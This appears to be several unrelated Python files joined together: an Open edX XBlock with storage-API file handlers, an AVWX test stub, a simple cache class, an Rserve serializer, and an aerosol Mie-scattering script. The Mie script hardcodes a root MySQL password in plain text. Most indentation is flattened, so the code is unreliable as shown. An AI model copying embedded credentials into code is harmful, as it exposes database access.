            log.info("storage api upload failed:")
            log.info("department argument can't be an empty string")
        except QualifierValueError:
            log.info("storage api upload failed:")
            log.info("qualifier argument can't be an empty string")
        except BucketValueError:
            log.info("storage api upload failed:")
            log.info("invalid bucket key argument")
        except S3ValueError:
            log.info("storage api upload failed:")
            log.info("invalid S3 credentials")
        except SocketValueError:
            log.info("storage api upload failed:")
            log.info("invalid host")
self.save()
return Response(json_body=self.studio_state())
@XBlock.handler
def download_assignment(self, request, suffix=''):
# pylint: disable=unused-argument
"""
Downloads the student's answer file from storage api and then returns a response
"""
try:
file_descriptor = storage.access_data(str(self.course_id),str(self.xmodule_runtime.anonymous_student_id), str(self.location.block_id))
log.info("download through storage api successful")
        except PersonValueError:
            log.info("storage api download failed:")
            log.info("person argument can't be an empty string")
            return
        except DepartmentValueError:
            log.info("storage api download failed:")
            log.info("department argument can't be an empty string")
            return
        except QualifierValueError:
            log.info("storage api download failed:")
            log.info("qualifier argument can't be an empty string")
            return
        except BucketValueError:
            log.info("storage api download failed:")
            log.info("invalid bucket key argument")
            return
        except S3ValueError:
            log.info("storage api download failed:")
            log.info("invalid S3 credentials")
            return
        except SocketValueError:
            log.info("storage api download failed:")
            log.info("invalid host")
            return
app_iter = iter(partial(file_descriptor.read, BLOCK_SIZE), '')
return Response(
app_iter=app_iter,
content_type=self.raw_answer["mimetype"],
content_disposition="attachment; filename=" + self.raw_answer["filename"].encode('utf-8'))
@XBlock.handler
def download_question(self, request, suffix=''):
# pylint: disable=unused-argument
"""
Downloads the question file from storage api and then returns a response
"""
log.info("download_question called")
try:
file_descriptor = storage.access_data(str(self.course_id), "question", str(self.location.block_id))
log.info("file_descriptor is:")
log.info(file_descriptor)
if not file_descriptor:
log.info("storage api download failed:")
log.info("file doesn't exist")
return
log.info("download through storage api successful")
app_iter = iter(partial(file_descriptor.read, BLOCK_SIZE), '')
return Response(
app_iter=app_iter,
content_type=self.raw_question["mimetype"],
content_disposition="attachment; filename=" + self.raw_question["filename"].encode('utf-8'))
        except storage.PersonValueError:
            log.info("storage api download failed:")
            log.info("person argument can't be an empty string")
            return
        except DepartmentValueError:
            log.info("storage api download failed:")
            log.info("department argument can't be an empty string")
            return
        except QualifierValueError:
            log.info("storage api download failed:")
            log.info("qualifier argument can't be an empty string")
            return
        except BucketValueError:
            log.info("storage api download failed:")
            log.info("invalid bucket key argument")
            return
        except S3ValueError:
            log.info("storage api download failed:")
            log.info("invalid S3 credentials")
            return
        except SocketValueError:
            log.info("storage api download failed:")
            log.info("invalid host")
            return
@XBlock.handler
def download_solution(self, request, suffix=''):
# pylint: disable=unused-argument
"""
Downloads the solution file from storage api and then returns a response
"""
log.info("download_solution called")
try:
file_descriptor = storage.access_data(str(self.course_id), "solution", str(self.location.block_id))
log.info("file_descriptor is:")
log.info(file_descriptor)
if not file_descriptor:
log.info("storage api download failed:")
log.info("file doesn't exist")
return
log.info("download through storage api successful")
app_iter = iter(partial(file_descriptor.read, BLOCK_SIZE), '')
return Response(
app_iter=app_iter,
content_type=self.raw_solution["mimetype"],
content_disposition="attachment; filename=" + self.raw_solution["filename"].encode('utf-8'))
        except storage.PersonValueError:
            log.info("storage api download failed:")
            log.info("person argument can't be an empty string")
            return
        except DepartmentValueError:
            log.info("storage api download failed:")
            log.info("department argument can't be an empty string")
            return
        except QualifierValueError:
            log.info("storage api download failed:")
            log.info("qualifier argument can't be an empty string")
            return
        except BucketValueError:
            log.info("storage api download failed:")
            log.info("invalid bucket key argument")
            return
        except S3ValueError:
            log.info("storage api download failed:")
            log.info("invalid S3 credentials")
            return
        except SocketValueError:
            log.info("storage api download failed:")
            log.info("invalid host")
            return
def grade_this_guy(self):
"""
Generates the path for the three files to be compared, passes them to the grader function, popuates the
score field, runtime.publish-es the grades so that it shows up in the progress page
"""
log.info("Function has been called")
answer = self._file_storage_path(self.raw_answer['sha1'], self.raw_answer['filename'])
question = self._question_storage_path(self.raw_question['sha1'], self.raw_question['filename'])
solution = self._solution_storage_path(self.raw_solution['sha1'], self.raw_solution['filename'])
answer = os.path.join(IMAGEDIFF_ROOT, answer)
question = os.path.join(IMAGEDIFF_ROOT, question)
solution = os.path.join(IMAGEDIFF_ROOT, solution)
self.score = grade(question, answer, solution)
if self.score > self.points:
self.score = self.points
self.points=float(self.max_score())
self.save()
if self.score >= 0:
self.runtime.publish(self, 'grade',{ 'value': self.score, 'max_value':self.max_score(),})
log.info("runtime.publish-ed")
self.save()
return Response(json_body=self.student_state())
def _file_storage_path(self, sha1, filename):
"""
Returns the local path where the student's uploaded file is saved
"""
# pylint: disable=no-member
path = (
'{loc.org}/{loc.course}/{loc.block_type}/{loc.block_id}/'
'{student_id}/{sha1}{ext}'.format(
student_id = self.xmodule_runtime.anonymous_student_id,
loc=self.location,
sha1=sha1,
ext=os.path.splitext(filename)[1]
)
)
return path
def _question_storage_path(self, sha1, filename):
"""
Returns the local path of the question file uploaded by the instructor
"""
# pylint: disable=no-member
path = (
'{loc.org}/{loc.course}/{loc.block_type}/{loc.block_id}/'
'static/question/{sha1}{ext}'.format(
sha1 = sha1,
loc=self.location,
ext=os.path.splitext(filename)[1]
)
)
return path
def _solution_storage_path(self, sha1, filename):
"""
Returns the local path of the solution file uploaded by the instructor
"""
# pylint: disable=no-member
path = (
'{loc.org}/{loc.course}/{loc.block_type}/{loc.block_id}/'
'static/solution/{sha1}{ext}'.format(
sha1 = sha1,
loc=self.location,
ext=os.path.splitext(filename)[1]
)
)
return path
def _get_sha1(file_descriptor):
"""
Get file hex digest (fingerprint).
"""
sha1 = hashlib.sha1()
for block in iter(partial(file_descriptor.read, BLOCK_SIZE), ''):
sha1.update(block)
file_descriptor.seek(0)
return sha1.hexdigest()
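# Note: _get_sha1 reads the whole file object in BLOCK_SIZE chunks and then
# seeks back to the start, so the caller can reuse the same descriptor.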
def _resource(path): # pragma: NO COVER
"""
Handy helper for getting resources from our kit.
"""
data = pkg_resources.resource_string(__name__, path)
return data.decode("utf8")
def load_resource(resource_path): # pragma: NO COVER
"""
Gets the content of a resource
"""
resource_content = pkg_resources.resource_string(__name__, resource_path)
return unicode(resource_content)
def render_template(template_path, context=None): # pragma: NO COVER
"""
Evaluate a template by resource path, applying the provided context.
"""
if context is None:
context = {}
template_str = load_resource(template_path)
template = Template(template_str)
return template.render(Context(context))
def require(assertion):
"""
Raises PermissionDenied if assertion is not true.
"""
if not assertion:
raise PermissionDenied
def workbench_scenario():
    return [
        ("ExcelSheetAssessmentXBlock", """agea"""), ]
|
"""
AVWX Test Suite
"""
import sys
from pathlib import Path
sys.path.insert(0, str(Path(__file__).parent.joinpath("..")))  # sys.path entries must be str
|
class Cache(object):
def __init__(self, max=1000):
self.d = {}
self.l = []
self.max = max
def put(self, k, v):
self.d[k] = v
self.l.append(k)
while (len(self.l) > self.max):
kdel = self.l[0]
del self.l[0]
del self.d[kdel]
def get(self, k):
try:
return self.d[k]
        except KeyError:
return None
def exists(self, k):
return k in self.d
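# Minimal usage sketch (for illustration; not part of the original class):
# entries are evicted in insertion order once more than `max` keys are stored.
if __name__ == '__main__':
    c = Cache(max=2)
    c.put('a', 1)
    c.put('b', 2)
    c.put('c', 3)              # evicts 'a', the oldest key
    assert not c.exists('a')
    assert c.get('b') == 2 and c.get('c') == 3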
|
"""
Serializer class to convert Python objects into a binary data stream for sending them to Rserve.
"""
__all__ = ['reval', 'rassign', 'rSerializeResponse']
import struct, os, cStringIO, socket
import numpy
import rtypes
from misc import FunctionMapper
from rexceptions import RSerializationError
from taggedContainers import TaggedList, TaggedArray
DEBUG = False
def padLen4(aString):
    """Calculate how many additional bytes a given string needs for its length to be a multiple of 4.
    The result is always between 1 and 4, so padded strings gain at least one null byte."""
    l = len(aString)
    return 4-divmod(l, 4)[1]
def padString4(aString, padByte='\0'):
    """Return the given string padded at the end with `padByte` so that its length is a multiple of 4"""
    return aString + padLen4(aString) * padByte
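# Illustration (example checks of the helpers above): the padding always
# adds between 1 and 4 bytes.
assert padString4("abcde") == "abcde\0\0\0"    # 5 bytes -> 8 bytes
assert len(padString4("abcd")) == 8            # already aligned: +4 bytes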
class RSerializer(object):
"""
    Class to serialize Python objects into a binary data stream for sending them to Rserve.
Depending on 'commandType' given to __init__ the resulting binary string can be used to send a command, to assign
a variable in Rserve, or to reply to a request received from Rserve.
"""
serializeMap = {}
fmap = FunctionMapper(serializeMap)
#
def __init__(self, commandType, fp=None):
if isinstance(fp, socket._socketobject):
self._orig_fp = fp.makefile()
self._fp = cStringIO.StringIO()
elif not fp:
self._fp = fp or cStringIO.StringIO()
self._orig_fp = None
else:
self._fp = self._orig_fp = fp
self._dataSize = 0
self._writeHeader(commandType)
def _getRetVal(self):
if self._orig_fp is self._fp:
return None
elif not self._orig_fp:
return self._fp.getvalue()
else:
# i.e. socket: write result of _fp into socket-fp
self._orig_fp.write(self._fp.getvalue())
self._orig_fp.flush()
return None
def _writeHeader(self, commandType):
        # Set the message length to zero initially; it will be fixed up in finalize() once the total size is determined:
msg_length_lower = msg_length_higher = 0
data_offset = 0
header = struct.pack('<IIII', commandType, msg_length_lower, data_offset, msg_length_higher)
if DEBUG:
print 'Writing header: %d bytes: %s' % (len(header), repr(header))
self._fp.write(header)
def finalize(self):
# and finally we correctly set the length of the entire data package (in bytes) minus header size:
# dataSize = self._fp.tell() - rtypes.RHEADER_SIZE
# TODO: Also handle data larger than 2**32 (user upper part of message length!!)
assert self._dataSize < 2**32, 'data larger than 2**32 not yet implemented'
self._fp.seek(4)
if DEBUG:
            print 'writing message size: %2d' % self._dataSize
self._fp.write(struct.pack('<I', self._dataSize))
return self._getRetVal()
def _writeDataHeader(self, rTypeCode, length):
'''
A data header consists of 4 bytes:
[1] rTypeCode
[2-4] length of data block (3 bytes!!!)
'''
self._fp.write(struct.pack('<Bi', rTypeCode, length)[:4])
def serialize(self, o, dtTypeCode=rtypes.DT_SEXP):
# Here the data typecode (DT_* ) of the entire message is written, with its length.
# Then the actual data itself is written out.
if dtTypeCode == rtypes.DT_STRING:
paddedString = padString4(o)
length = len(paddedString)
self._writeDataHeader(dtTypeCode, length)
self._fp.write(paddedString)
elif dtTypeCode == rtypes.DT_INT:
length = 4
self._writeDataHeader(dtTypeCode, length)
self._fp.write(struct.pack('<i', o))
elif dtTypeCode == rtypes.DT_SEXP:
startPos = self._fp.tell()
self._fp.write('\0\0\0\0')
length = self._serializeExpr(o)
self._fp.seek(startPos)
self._writeDataHeader(dtTypeCode, length)
else:
raise NotImplementedError('no support for DT-type %x' % dtTypeCode)
self._dataSize += length + 4
def _serializeExpr(self, o, rTypeHint=None):
if not rTypeHint:
if isinstance(o, numpy.ndarray):
if o.dtype.type == numpy.int64:
o = o.astype(numpy.int32)
rTypeHint = rtypes.numpyMap[o.dtype.type] #o.dtype.type
else:
rTypeHint = type(o)
try:
s_func = self.serializeMap[rTypeHint]
except KeyError:
raise RSerializationError('Serialization of type "%s" not implemented' % rTypeHint)
startPos = self._fp.tell()
if DEBUG:
print 'Serializing expr %r with rTypeCode=%s using function %s' % (o, rTypeHint, s_func)
s_func(self, o, rTypeCode=rTypeHint)
# determine and return the length of actual R expression data:
return self._fp.tell() - startPos
@fmap(rtypes.XT_STR, rtypes.XT_SYMNAME)
def s_string_or_symbol(self, o, rTypeCode=rtypes.XT_STR):
'''
Possible rTypeCodes for a given string are:
- XT_STR
- XT_SYMNAME
'''
# The string packet contains trailing padding zeros to make it always a multiple of 4 in length:
paddedString = padString4(o)
length = len(paddedString)
self._writeDataHeader(rTypeCode, length)
if DEBUG:
print 'Writing string: %2d bytes: %s' % (length, repr(paddedString))
self._fp.write(paddedString)
@fmap(str, numpy.string_, rtypes.XT_ARRAY_STR)
def s_xt_array_str(self, o, rTypeCode=None):
# Works for single strings, lists of strings, and numpy arrays of strings (dtype 'S' or 'O')
if type(o) in [str, numpy.string_]:
# single string
o = [o]
zeroSeparatedString = '\0'.join(o)
padLength = padLen4(zeroSeparatedString)
length = len(zeroSeparatedString) + padLength
self._writeDataHeader(rtypes.XT_ARRAY_STR, length)
self._fp.write(zeroSeparatedString)
self._fp.write('\0\1\1\1'[:padLength])
def __s_xt_array_numeric_tag_data(self, o):
# Determine which tags the array must be given:
xt_tag_list = []
if o.ndim > 1:
xt_tag_list.append(('dim', numpy.array(o.shape, numpy.int32)))
if isinstance(o, TaggedArray):
xt_tag_list.append(('names', numpy.array(o.attr)))
attrFlag = rtypes.XT_HAS_ATTR if xt_tag_list else 0
rTypeCode = rtypes.numpyMap[o.dtype.type] | attrFlag
self._writeDataHeader(rTypeCode, 0)
if attrFlag:
self.s_xt_tag_list(xt_tag_list)
return rTypeCode
@fmap(rtypes.XT_ARRAY_CPLX, rtypes.XT_ARRAY_DOUBLE, rtypes.XT_ARRAY_INT)
def s_xt_array_numeric(self, o, rTypeCode=None):
'''
@param o: numpy array or subclass (e.g. TaggedArray)
@note: If o is multi-dimensional a tagged array is created. Also if o is of type TaggedArray.
'''
startPos = self._fp.tell()
rTypeCode = self.__s_xt_array_numeric_tag_data(o)
# TODO: make this also work on big endian machines (data must be written in little-endian!!)
self._fp.write(o.tostring())
length = self._fp.tell() - startPos - 4 # subtract length of header==4 bytes
self._fp.seek(startPos)
self._writeDataHeader(rTypeCode, length)
self._fp.seek(0, os.SEEK_END)
@fmap(rtypes.XT_ARRAY_BOOL)
def s_xt_array_boolean(self, o, rTypeCode=None):
'''
@param o: numpy array or subclass (e.g. TaggedArray) with boolean values
@note: If o is multi-dimensional a tagged array is created. Also if o is of type TaggedArray.
'''
startPos = self._fp.tell()
rTypeCode = self.__s_xt_array_numeric_tag_data(o)
# A boolean vector starts with its number of boolean values in the vector (as int32):
structCode = '<'+rtypes.structMap[int]
self._fp.write(struct.pack(structCode, len(o)))
# Then write the boolean values themselves:
data = o.tostring()
self._fp.write(data)
# Finally pad the binary data to be of a multiple of four in length:
self._fp.write(padLen4(data) * "\xff")
# Update the vector header:
length = self._fp.tell() - startPos - 4 # subtract length of header==4 bytes
self._fp.seek(startPos)
self._writeDataHeader(rTypeCode, length)
self._fp.seek(0, os.SEEK_END)
@fmap(int, float, numpy.float64, numpy.int32)
def s_atom_to_xt_array_numeric(self, o, rTypeCode=None):
'Render single numeric items into their corresponding array counterpart in r'
rTypeCode = rtypes.atom2ArrMap[type(o)]
structCode = '<'+rtypes.structMap[type(o)]
length = struct.calcsize(structCode)
self._writeDataHeader(rTypeCode, length)
self._fp.write(struct.pack(structCode, o))
@fmap(bool, numpy.bool_)
def s_atom_to_xt_array_boolean(self, o, rTypeCode=None):
"""Render single boolean items into their corresponding array counterpart in r.
Always convert a boolean atomic value into a specialized boolean R vector.
"""
arr = numpy.array([o])
self.s_xt_array_boolean(arr)
@fmap(list, TaggedList)
def s_xt_vector(self, o, rTypeCode=None):
'Render all objects of given python list into generic r vector'
startPos = self._fp.tell()
# remember start position for calculating length in bytes of entire list content
attrFlag = rtypes.XT_HAS_ATTR if o.__class__ == TaggedList else 0
self._writeDataHeader(rtypes.XT_VECTOR | attrFlag, 0)
if attrFlag:
self.s_xt_tag_list([('names', numpy.array(o.keys))])
for v in o:
self._serializeExpr(v)
length = self._fp.tell() - startPos
self._fp.seek(startPos)
# now write header again with correct length information
self._writeDataHeader(rtypes.XT_VECTOR | attrFlag, length - 4) # subtract 4 (omit list header!)
self._fp.seek(0, os.SEEK_END)
def s_xt_tag_list(self, o, rTypeCode=None):
startPos = self._fp.tell()
self._writeDataHeader(rtypes.XT_LIST_TAG, 0)
for tag, data in o:
self._serializeExpr(data)
self._serializeExpr(tag, rTypeHint=rtypes.XT_SYMNAME)
length = self._fp.tell() - startPos
self._fp.seek(startPos)
# now write header again with correct length information
self._writeDataHeader(rtypes.XT_LIST_TAG, length - 4) # subtract 4 (omit list header!)
self._fp.seek(0, os.SEEK_END)
############################################################
#### class methods for calling specific Rserv functions ####
@classmethod
def rEval(cls, aString, fp=None):
"""Create binary code for evaluating a string expression remotely in Rserve"""
s = cls(rtypes.CMD_eval, fp=fp)
s.serialize(aString, dtTypeCode=rtypes.DT_STRING)
return s.finalize()
@classmethod
def rAssign(cls, varname, o, fp=None):
"""Create binary code for assigning an expression to a variable remotely in Rserve"""
s = cls(rtypes.CMD_setSEXP, fp=fp)
s.serialize(varname, dtTypeCode=rtypes.DT_STRING)
s.serialize(o, dtTypeCode=rtypes.DT_SEXP)
return s.finalize()
@classmethod
def rSerializeResponse(cls, Rexp, fp=None):
# mainly used for unittesting
s = cls(rtypes.CMD_RESP | rtypes.RESP_OK, fp=fp)
s.serialize(Rexp, dtTypeCode=rtypes.DT_SEXP)
return s.finalize()
rEval = RSerializer.rEval
rAssign = RSerializer.rAssign
rSerializeResponse = RSerializer.rSerializeResponse
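if __name__ == '__main__':
    # Minimal sketch (not part of the original module): serialize a CMD_eval
    # message for the R expression "1+1" into a byte string.
    binaryMessage = rEval('1+1')
    print 'serialized eval command: %d bytes' % len(binaryMessage)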
|
from pymiecoated import Mie
import sys
import os
import numpy as np
from pprint import pprint
from datetime import datetime
import mysql.connector
import math
import matplotlib.pyplot as plt
import matplotlib.colors
import calendar
from scipy.optimize import curve_fit
#assumed_coating_th = [41,43,44,40,38,40,44,41,38,38] #nm sc1-7 (alternate calibration, superseded by the line below)
assumed_coating_th = [43,57,50,57,51,47,46,40,30,17] #nm sc10
wavelength = 550 #nm
rBC_RI = complex(2.26,1.26)
savefig = False
show_distr_plots = False
min_alt = 0
max_alt = 5000
alt_incr = 500
bin_value_min = 80
bin_value_max = 220
bin_incr = 10
bin_number_lim = (bin_value_max-bin_value_min)/bin_incr
R = 8.3144621 # in m3*Pa/(K*mol)
flight_times = {
'science 1' : [datetime(2015,4,5,9,0),datetime(2015,4,5,14,0),15.6500, 78.2200] ,
}
cnx = mysql.connector.connect(user='root', password='Suresh15', host='localhost', database='black_carbon')
cursor = cnx.cursor()
def lognorm(x_vals, A, w, xc):
return A/(np.sqrt(2*math.pi)*w*x_vals)*np.exp(-(np.log(x_vals/xc))**2/(2*w**2))
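# lognorm(x; A, w, xc) = A / (sqrt(2*pi)*w*x) * exp(-ln(x/xc)^2 / (2*w^2)):
# a lognormal density with geometric mean xc and log-space width w, scaled by A.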
def MieCalc(wavelength,core_dia,coat_th):
mie = Mie()
wl = wavelength
core_rad = core_dia/2 #nm
shell_thickness = coat_th
size_par = 2*math.pi*core_rad*1/wl
#Refractive indices PSL 1.59-0.0i rBC 2.26- 1.26i shell 1.5-0.0i
core_RI = rBC_RI
shell_rad = core_rad + shell_thickness
shell_RI = complex(1.5,0.0)
mie.x = 2*math.pi*core_rad/wl
mie.m = core_RI
mie.y = 2*math.pi*shell_rad/wl
mie.m2 = shell_RI
abs = mie.qabs()
abs_xs_nm2 = abs*math.pi*shell_rad**2 #in nm^2
abs_xs = abs_xs_nm2*1e-14 #in cm^2
sca = mie.qsca()
sca_xs_nm2 = sca*math.pi*shell_rad**2 #in nm^2
sca_xs = sca_xs_nm2*1e-14 #in cm^2
ext_xs = sca_xs+abs_xs
return [abs_xs,sca_xs,ext_xs]
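# Sanity-check sketch (added, with hypothetical example inputs of a 150 nm
# core and 40 nm coating): MieCalc returns ext_xs = abs_xs + sca_xs by
# construction, so the identity must hold.
_abs_xs, _sca_xs, _ext_xs = MieCalc(wavelength, 150, 40)
assert abs(_ext_xs - (_abs_xs + _sca_xs)) < 1e-30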
fit_bins = []
for x in range (30,1000,1):
fit_bins.append(x)
plot_data={}
for flight in flight_times:
print flight
lower_alt = min_alt
start_time = flight_times[flight][0]
end_time = flight_times[flight][1]
UNIX_start_time = calendar.timegm(start_time.utctimetuple())
UNIX_end_time = calendar.timegm(end_time.utctimetuple())
alt = 0
while (lower_alt + alt_incr) <= max_alt:
#make data binning dicts for the interval
mass_binned_data = {}
number_binned_data = {}
i = bin_value_min
while i < bin_value_max:
mass_binned_data[i] = []
number_binned_data[i] = []
i+=bin_incr
#get mass data
cursor.execute(('SELECT bnm.70t80,bnm.80t90,bnm.90t100,bnm.100t110,bnm.110t120,bnm.120t130,bnm.130t140,bnm.140t150,bnm.150t160,bnm.160t170,bnm.170t180,bnm.180t190,bnm.190t200,bnm.200t210,bnm.210t220,bnm.sampled_vol,bnm.total_mass, ftd.temperature_C,ftd.BP_Pa from polar6_binned_mass_and_sampled_volume_alertcalib bnm join polar6_flight_track_details ftd ON bnm.flight_track_data_id = ftd.id WHERE ftd.alt >=%s and ftd.alt < %s and bnm.UNIX_UTC_ts >= %s and bnm.UNIX_UTC_ts < %s'),(lower_alt,(lower_alt + alt_incr),UNIX_start_time,UNIX_end_time))
mass_data = cursor.fetchall()
for row in mass_data:
volume_sampled = row[15]
total_mass = row[16]
temperature = row[17] + 273.15 #convert to Kelvin
pressure = row[18]
correction_factor_for_STP = (101325/pressure)*(temperature/273)
total_mass_conc_value = total_mass*correction_factor_for_STP/volume_sampled
#append STP corrected mass conc to dict of binned data
i=1
j=bin_value_min
while i <= bin_number_lim:
mass_binned_data[j].append(row[i]*correction_factor_for_STP/volume_sampled)
i+=1
j+=10
#get number data
cursor.execute(('SELECT bnn.70t80,bnn.80t90,bnn.90t100,bnn.100t110,bnn.110t120,bnn.120t130,bnn.130t140,bnn.140t150,bnn.150t160,bnn.160t170,bnn.170t180,bnn.180t190,bnn.190t200,bnn.200t210,bnn.210t220,bnn.sampled_vol,bnn.total_number, ftd.temperature_C,ftd.BP_Pa from polar6_binned_number_and_sampled_volume_alertcalib bnn join polar6_flight_track_details ftd ON bnn.flight_track_data_id = ftd.id WHERE ftd.alt >=%s and ftd.alt < %s and bnn.UNIX_UTC_ts >= %s and bnn.UNIX_UTC_ts < %s'),(lower_alt,(lower_alt + alt_incr),UNIX_start_time,UNIX_end_time))
number_data = cursor.fetchall()
for row in number_data:
volume_sampled = row[15]
total_number = row[16]
temperature = row[17] + 273.15 #convert to Kelvin
pressure = row[18]
correction_factor_for_STP = (101325/pressure)*(temperature/273)
#append STP corrected number conc to dict of binned data
i=1
j=bin_value_min
while i <= bin_number_lim:
number_binned_data[j].append(row[i]*correction_factor_for_STP/volume_sampled)
i+=1
j+=10
#make lists from binned data and sort
binned_list = []
number_binned_list = []
for key in mass_binned_data:
abs_xsec = MieCalc(wavelength,(key+bin_incr/2),assumed_coating_th[alt])[0]
sca_xsec = MieCalc(wavelength,(key+bin_incr/2),assumed_coating_th[alt])[1]
abs_xsec_bare = MieCalc(wavelength,(key+bin_incr/2),0)[0]
sca_xsec_bare = MieCalc(wavelength,(key+bin_incr/2),0)[1]
binned_list.append([(key+bin_incr/2), np.mean(mass_binned_data[key]), np.mean(number_binned_data[key]), abs_xsec,sca_xsec, abs_xsec_bare,sca_xsec_bare])
binned_list.sort()
#optical constants for the measured mass range
optical_data_meas = []
for row in binned_list:
row[1] = row[1]/(math.log((row[0]+bin_incr/2))-math.log(row[0]-bin_incr/2)) #normalize mass
row[2] = row[2]/(math.log((row[0]+bin_incr/2))-math.log(row[0]-bin_incr/2)) #normalize number
bin_midpoint = row[0]
bin_mass = row[1] #in fg/cm3
bin_number = row[2] #in #/cm3
bin_abs_xsec = row[3] #in cm2
bin_sca_xsec = row[4] #in cm2
bin_abs_xsec_bare = row[5] #in cm2
bin_sca_xsec_bare = row[6] #in cm2
vol_abs_coeff = bin_number*bin_abs_xsec #in cm-1
vol_sca_coeff = bin_number*bin_sca_xsec #in cm-1
vol_abs_coeff_bare = bin_number*bin_abs_xsec_bare #in cm-1
vol_sca_coeff_bare = bin_number*bin_sca_xsec_bare #in cm-1
mass_abs_coeff_int = (vol_abs_coeff)/bin_mass #in cm2/fg
mass_abs_coeff = mass_abs_coeff_int*(10**11) #in m2/g
optical_data_meas.append([bin_midpoint,bin_mass,bin_number,vol_abs_coeff,vol_sca_coeff,vol_abs_coeff_bare,vol_sca_coeff_bare])
bin_midpoints = np.array([row[0] for row in optical_data_meas])
mass_concs = [row[1] for row in optical_data_meas]
mass_concs_sum = np.sum([row[1] for row in optical_data_meas])
number_concs = np.array([row[2] for row in optical_data_meas])
vol_abs_coeff_sum = np.sum([row[3] for row in optical_data_meas])
vol_sca_coeff_sum = np.sum([row[4] for row in optical_data_meas])
vol_abs_coeff_sum_bare = np.sum([row[5] for row in optical_data_meas])
vol_sca_coeff_sum_bare = np.sum([row[6] for row in optical_data_meas])
MAC_meas = vol_abs_coeff_sum*(10**11)/mass_concs_sum
SSA_meas = vol_sca_coeff_sum/(vol_sca_coeff_sum+vol_abs_coeff_sum)
MAC_meas_bare = vol_abs_coeff_sum_bare*(10**11)/mass_concs_sum
SSA_meas_bare = vol_sca_coeff_sum_bare/(vol_sca_coeff_sum_bare+vol_abs_coeff_sum_bare)
abs_enhancement_meas = vol_abs_coeff_sum/vol_abs_coeff_sum_bare
#fit mass distr with lognormal
#get Dg and sigma and write to dict
try:
popt, pcov = curve_fit(lognorm, bin_midpoints, mass_concs)
fit_binned_mass_concs = []
for bin in fit_bins:
fit_val = lognorm(bin, popt[0], popt[1], popt[2])
fit_binned_mass_concs.append([bin,fit_val])
        except RuntimeError:
            # curve_fit raises RuntimeError when the fit fails to converge;
            # the code below assumes the fit succeeded for this altitude bin.
            print 'fit failure'
#fit number distr with lognormal
try:
popt, pcov = curve_fit(lognorm, bin_midpoints, number_concs)
fit_binned_number_concs = []
fit_binned_mass_concs_c = []
for bin in fit_bins:
fit_val = lognorm(bin, popt[0], popt[1], popt[2])
fit_binned_number_concs.append([bin,fit_val])
        except RuntimeError:
            print 'fit failure'
#optical constants for the extrapolated (from fit) full mass range
i=0
optical_data = []
for row in fit_binned_number_concs:
bin_midpoint = row[0]
bin_mass = fit_binned_mass_concs[i][1] #in fg/cm3
bin_number = row[1] #in #/cm3
abs_xsec = MieCalc(wavelength,bin_midpoint,assumed_coating_th[alt])[0]
sca_xsec = MieCalc(wavelength,bin_midpoint,assumed_coating_th[alt])[1]
abs_xsec_bare = MieCalc(wavelength,bin_midpoint,0)[0]
sca_xsec_bare = MieCalc(wavelength,bin_midpoint,0)[1]
vol_abs_coeff = bin_number*abs_xsec #in cm-1
vol_sca_coeff = bin_number*sca_xsec #in cm-1
vol_abs_coeff_bare = bin_number*abs_xsec_bare #in cm-1
vol_sca_coeff_bare = bin_number*sca_xsec_bare #in cm-1
mass_abs_coeff_int = (vol_abs_coeff)/bin_mass #in cm2/fg
mass_abs_coeff = mass_abs_coeff_int*(10**11) #in m2/g
optical_data.append([bin_mass,vol_abs_coeff,vol_sca_coeff,vol_abs_coeff_bare,vol_sca_coeff_bare,bin_midpoint])
i+=1
mass_concs_sum_calc = np.sum([row[0] for row in optical_data])
vol_abs_coeff_sum_calc = np.sum([row[1] for row in optical_data])
vol_sca_coeff_sum_calc = np.sum([row[2] for row in optical_data])
vol_abs_coeff_sum_calc_bare = np.sum([row[3] for row in optical_data])
vol_sca_coeff_sum_calc_bare = np.sum([row[4] for row in optical_data])
MAC_calc = vol_abs_coeff_sum_calc*(10**11)/mass_concs_sum_calc
SSA_calc = vol_sca_coeff_sum_calc/(vol_sca_coeff_sum_calc+vol_abs_coeff_sum_calc)
MAC_calc_bare = vol_abs_coeff_sum_calc_bare*(10**11)/mass_concs_sum_calc
SSA_calc_bare = vol_sca_coeff_sum_calc_bare/(vol_sca_coeff_sum_calc_bare+vol_abs_coeff_sum_calc_bare)
abs_enhancement_calc = vol_abs_coeff_sum_calc/vol_abs_coeff_sum_calc_bare
#add overall data to dict
mean_alt = lower_alt + alt_incr/2
print mean_alt
if mean_alt in plot_data:
plot_data[mean_alt].append([MAC_calc,SSA_calc,MAC_calc_bare,SSA_calc_bare,MAC_meas,SSA_meas,MAC_meas_bare,SSA_meas_bare,abs_enhancement_meas,abs_enhancement_calc])
else:
plot_data[mean_alt] = [[MAC_calc,SSA_calc,MAC_calc_bare,SSA_calc_bare,MAC_meas,SSA_meas,MAC_meas_bare,SSA_meas_bare,abs_enhancement_meas,abs_enhancement_calc]]
####plotting distrs if desired
fit_binned_mass_conc_vals = [row[1] for row in fit_binned_mass_concs]
fit_binned_number_conc_vals = [row[1] for row in fit_binned_number_concs]
if show_distr_plots == True:
fig = plt.figure()
ax1 = fig.add_subplot(111)
ax1.semilogx(bin_midpoints,number_concs, color = 'g',marker='o')
ax1.semilogx(bin_midpoints,mass_concs, color = 'b',marker='o')
ax1.semilogx(fit_bins,fit_binned_mass_conc_vals, color = 'b',marker=None)
ax1.semilogx(fit_bins,fit_binned_number_conc_vals, color = 'g',marker=None)
plt.ylabel('dM/dlog(VED)')
ax1.set_xlabel('VED (nm)')
plt.show()
lower_alt += alt_incr
alt += 1
cnx.close()
print 'next step . . .'
plot_list = []
for mean_alt in plot_data:
mean_MAC_calc = np.mean([row[0] for row in plot_data[mean_alt]])
min_MAC_calc = mean_MAC_calc - np.min([row[0] for row in plot_data[mean_alt]])
max_MAC_calc = np.max([row[0] for row in plot_data[mean_alt]]) - mean_MAC_calc
mean_SSA_calc = np.mean([row[1] for row in plot_data[mean_alt]])
min_SSA_calc = mean_SSA_calc - np.min([row[1] for row in plot_data[mean_alt]])
max_SSA_calc = np.max([row[1] for row in plot_data[mean_alt]]) - mean_SSA_calc
mean_MAC_calc_bare = np.mean([row[2] for row in plot_data[mean_alt]])
min_MAC_calc_bare = mean_MAC_calc_bare - np.min([row[2] for row in plot_data[mean_alt]])
max_MAC_calc_bare = np.max([row[2] for row in plot_data[mean_alt]]) - mean_MAC_calc_bare
mean_SSA_calc_bare = np.mean([row[3] for row in plot_data[mean_alt]])
min_SSA_calc_bare = mean_SSA_calc_bare - np.min([row[3] for row in plot_data[mean_alt]])
max_SSA_calc_bare = np.max([row[3] for row in plot_data[mean_alt]]) - mean_SSA_calc_bare
mean_MAC_meas = np.mean([row[4] for row in plot_data[mean_alt]])
